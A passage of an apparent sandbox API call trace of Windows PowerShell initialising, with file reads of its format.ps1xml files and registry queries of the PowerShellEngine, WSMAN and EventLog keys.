pguid=0x1ad3b0*(Data1=0xb49a4f38, Data2=0xd923, Data3=0x413f, Data4=([0]=0xb9, [1]=0x54, [2]=0x65, [3]=0xc0, [4]=0x66, [5]=0x34, [6]=0xc1, [7]=0x2d))) returned 0x0 [0074.124] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.125] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe2381727, Data2=0x69d9, Data3=0x4ce6, Data4=([0]=0x9f, [1]=0x3b, [2]=0xd1, [3]=0x8d, [4]=0xb3, [5]=0x2c, [6]=0xb0, [7]=0x6f))) returned 0x0 [0074.125] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xab3b7c10, Data2=0x946e, Data3=0x481c, Data4=([0]=0xb8, [1]=0x37, [2]=0x66, [3]=0x70, [4]=0x9e, [5]=0xb, [6]=0x98, [7]=0xad))) returned 0x0 [0074.125] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xa9cc5889, Data2=0x227a, Data3=0x42e7, Data4=([0]=0x83, [1]=0x44, [2]=0x6c, [3]=0x3b, [4]=0x4c, [5]=0x4d, [6]=0x5, [7]=0xec))) returned 0x0 [0074.125] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x4a71b7e8, Data2=0x8403, Data3=0x4681, Data4=([0]=0x9e, [1]=0x48, [2]=0x15, [3]=0xd9, [4]=0xbe, [5]=0xfe, [6]=0xd2, [7]=0x60))) returned 0x0 [0074.125] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1a0edff7, Data2=0x372d, Data3=0x4f03, Data4=([0]=0xbb, [1]=0x44, [2]=0x26, [3]=0xa1, [4]=0x40, [5]=0xd1, [6]=0x82, [7]=0x36))) returned 0x0 [0074.126] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.126] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xcb1b43f1, Data2=0x903b, Data3=0x4cc0, Data4=([0]=0xaf, [1]=0xc7, [2]=0x56, [3]=0x7b, [4]=0x10, [5]=0x60, [6]=0x6, [7]=0x4))) returned 0x0 [0074.126] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8a92e056, Data2=0x7ede, Data3=0x477c, Data4=([0]=0x99, [1]=0xb9, [2]=0xc2, [3]=0xac, [4]=0x33, [5]=0x51, [6]=0x5f, [7]=0x53))) returned 0x0 [0074.126] VirtualQuery (in: lpAddress=0x1abdd0, lpBuffer=0x1acc90, dwLength=0x30 | out: lpBuffer=0x1acc90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.126] VirtualQuery (in: lpAddress=0x1abdd0, lpBuffer=0x1acc90, dwLength=0x30 | out: lpBuffer=0x1acc90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.126] VirtualQuery (in: lpAddress=0x1abdd0, lpBuffer=0x1acc90, dwLength=0x30 | out: lpBuffer=0x1acc90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.127] VirtualQuery (in: lpAddress=0x1abdd0, lpBuffer=0x1acc90, dwLength=0x30 | out: lpBuffer=0x1acc90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.127] SetErrorMode (uMode=0x1) returned 0x1 [0074.127] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0074.127] SetErrorMode (uMode=0x1) returned 0x1 [0074.127] GetFileType (hFile=0x318) returned 0x1 [0074.127] ReadFile (in: hFile=0x318, lpBuffer=0x3c390d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c390d8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.128] ReadFile (in: hFile=0x318, lpBuffer=0x3c390d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c390d8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.129] ReadFile (in: hFile=0x318, lpBuffer=0x3c390d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c390d8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.129] ReadFile (in: hFile=0x318, lpBuffer=0x3c390d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c390d8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.129] ReadFile (in: hFile=0x318, lpBuffer=0x3c390d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c390d8*, lpNumberOfBytesRead=0x1ad0f8*=0x8b4, lpOverlapped=0x0) returned 1 [0074.129] ReadFile (in: hFile=0x318, lpBuffer=0x3c384f4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c384f4*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0074.129] ReadFile (in: hFile=0x318, lpBuffer=0x3c390d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c390d8*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0074.129] SetErrorMode (uMode=0x1) returned 0x1 [0074.130] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0074.130] SetErrorMode (uMode=0x1) returned 0x1 [0074.130] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0074.130] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0074.130] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd000 [0074.130] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd000, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0074.130] CoTaskMemFree (pv=0x1b3cd000) [0074.130] RegCloseKey (hKey=0x318) returned 0x0 [0074.131] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x277455ef, Data2=0x5d68, Data3=0x49a3, Data4=([0]=0x91, [1]=0x5d, [2]=0xe3, [3]=0x27, [4]=0x1c, [5]=0xc, [6]=0x96, [7]=0x17))) returned 0x0 [0074.132] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x2b41cf7f, Data2=0x1d31, Data3=0x48e1, Data4=([0]=0xb3, [1]=0x64, [2]=0xcb, [3]=0x7d, [4]=0x48, [5]=0x14, [6]=0xff, [7]=0x41))) returned 0x0 [0074.133] SetErrorMode (uMode=0x1) returned 0x1 [0074.133] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0074.133] SetErrorMode (uMode=0x1) returned 0x1 [0074.133] GetFileType (hFile=0x318) returned 0x1 [0074.133] ReadFile (in: hFile=0x318, lpBuffer=0x3c76ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c76ec0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.134] ReadFile (in: hFile=0x318, lpBuffer=0x3c76ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c76ec0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.135] ReadFile (in: hFile=0x318, lpBuffer=0x3c76ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c76ec0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.135] ReadFile (in: hFile=0x318, lpBuffer=0x3c76ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c76ec0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0074.135] ReadFile (in: hFile=0x318, lpBuffer=0x3c76ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c76ec0*, lpNumberOfBytesRead=0x1ad0f8*=0xe98, lpOverlapped=0x0) returned 1 [0074.135] ReadFile (in: hFile=0x318, lpBuffer=0x3c764c0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c764c0*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0074.135] ReadFile (in: hFile=0x318, lpBuffer=0x3c76ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3c76ec0*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0074.135] SetErrorMode (uMode=0x1) returned 0x1 [0074.136] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0074.136] SetErrorMode (uMode=0x1) returned 0x1 [0074.136] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0074.136] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0074.136] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd000 [0074.136] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd000, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0074.136] CoTaskMemFree (pv=0x1b3cd000) [0074.136] RegCloseKey (hKey=0x318) returned 0x0 [0074.137] VirtualQuery (in: lpAddress=0x1abc20, lpBuffer=0x1acae0, dwLength=0x30 | out: lpBuffer=0x1acae0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.137] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8d973768, Data2=0x4c29, Data3=0x4027, Data4=([0]=0x84, [1]=0x7c, [2]=0x76, [3]=0xed, [4]=0x77, [5]=0xaa, [6]=0x88, [7]=0x15))) returned 0x0 [0074.137] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xdba6f1f5, Data2=0xe90b, Data3=0x4e2a, Data4=([0]=0xb9, [1]=0x2c, [2]=0xd0, [3]=0x50, [4]=0x6b, [5]=0x62, [6]=0xbd, [7]=0x90))) returned 0x0 [0074.185] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.185] CoTaskMemFree (pv=0x3e46f0) [0074.185] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.185] CoTaskMemFree (pv=0x3e46f0) [0074.186] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.186] CoTaskMemFree (pv=0x3e46f0) [0074.186] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.186] CoTaskMemFree (pv=0x3e46f0) [0074.189] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.189] CoTaskMemFree (pv=0x3e46f0) [0074.194] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.194] CoTaskMemFree (pv=0x3e46f0) [0074.195] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.195] CoTaskMemFree (pv=0x3e46f0) [0074.209] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad398 | out: phkResult=0x1ad398*=0x318) returned 0x0 [0074.212] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad29c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad298, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad29c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad298*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.213] CoTaskMemFree (pv=0x0) [0074.213] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.213] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x432650, lpcchValueName=0x1ad348, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad348, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0074.214] CoTaskMemFree (pv=0x432650) [0074.214] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.214] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x432650, lpcchValueName=0x1ad348, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad348, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0074.214] CoTaskMemFree (pv=0x432650) [0074.214] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.214] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x432650, lpcchValueName=0x1ad348, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad348, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0074.214] CoTaskMemFree (pv=0x432650) [0074.214] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad32c, lpData=0x0, lpcbData=0x1ad328*=0x0 | out: lpType=0x1ad32c*=0x1, lpData=0x0, lpcbData=0x1ad328*=0x8) returned 0x0 [0074.214] CoTaskMemAlloc (cb=0xc) returned 0x1b3c6e20 [0074.214] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad2fc, lpData=0x1b3c6e20, lpcbData=0x1ad2f8*=0x8 | out: lpType=0x1ad2fc*=0x1, lpData="2.0", lpcbData=0x1ad2f8*=0x8) returned 0x0 [0074.214] CoTaskMemFree (pv=0x1b3c6e20) [0074.274] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2e8 | out: phkResult=0x1ad2e8*=0x31c) returned 0x0 [0074.275] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad1ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad1ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.275] CoTaskMemFree (pv=0x0) [0074.275] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.275] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x432650, lpcchValueName=0x1ad298, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad298, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0074.275] CoTaskMemFree (pv=0x432650) [0074.275] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.275] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x432650, lpcchValueName=0x1ad298, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad298, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0074.275] CoTaskMemFree (pv=0x432650) [0074.275] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.275] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x432650, lpcchValueName=0x1ad298, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad298, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0074.275] CoTaskMemFree (pv=0x432650) [0074.275] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad27c, lpData=0x0, lpcbData=0x1ad278*=0x0 | out: lpType=0x1ad27c*=0x1, lpData=0x0, lpcbData=0x1ad278*=0x8) returned 0x0 [0074.275] CoTaskMemAlloc (cb=0xc) returned 0x1b3c6c80 [0074.275] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad24c, lpData=0x1b3c6c80, lpcbData=0x1ad248*=0x8 | out: lpType=0x1ad24c*=0x1, lpData="2.0", lpcbData=0x1ad248*=0x8) returned 0x0 [0074.275] CoTaskMemFree (pv=0x1b3c6c80) [0074.276] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.276] CoTaskMemFree (pv=0x3e46f0) [0074.279] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0074.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.279] CoTaskMemFree (pv=0x3e46f0) [0074.282] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x320) returned 0x0 [0074.286] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad28c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad288, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad28c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad288*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.286] CoTaskMemFree (pv=0x0) [0074.287] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.287] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.287] CoTaskMemFree (pv=0x432650) [0074.287] CoTaskMemFree (pv=0x0) [0074.287] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.287] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.287] CoTaskMemFree (pv=0x432650) [0074.287] CoTaskMemFree (pv=0x0) [0074.287] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.287] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.287] CoTaskMemFree (pv=0x432650) [0074.287] CoTaskMemFree (pv=0x0) [0074.287] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.287] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.287] CoTaskMemFree (pv=0x432650) [0074.287] CoTaskMemFree (pv=0x0) [0074.287] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.287] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.287] CoTaskMemFree (pv=0x432650) [0074.287] CoTaskMemFree (pv=0x0) [0074.287] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.287] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.287] CoTaskMemFree (pv=0x432650) [0074.288] CoTaskMemFree (pv=0x0) [0074.288] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.288] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.288] CoTaskMemFree (pv=0x432650) [0074.288] CoTaskMemFree (pv=0x0) [0074.288] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.288] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.288] CoTaskMemFree (pv=0x432650) [0074.288] CoTaskMemFree (pv=0x0) [0074.288] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.288] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x432650, lpcchName=0x1ad318, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad318, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0074.288] CoTaskMemFree (pv=0x432650) [0074.288] CoTaskMemFree (pv=0x0) [0074.288] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad378 | out: phkResult=0x1ad378*=0x334) returned 0x0 [0074.288] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", 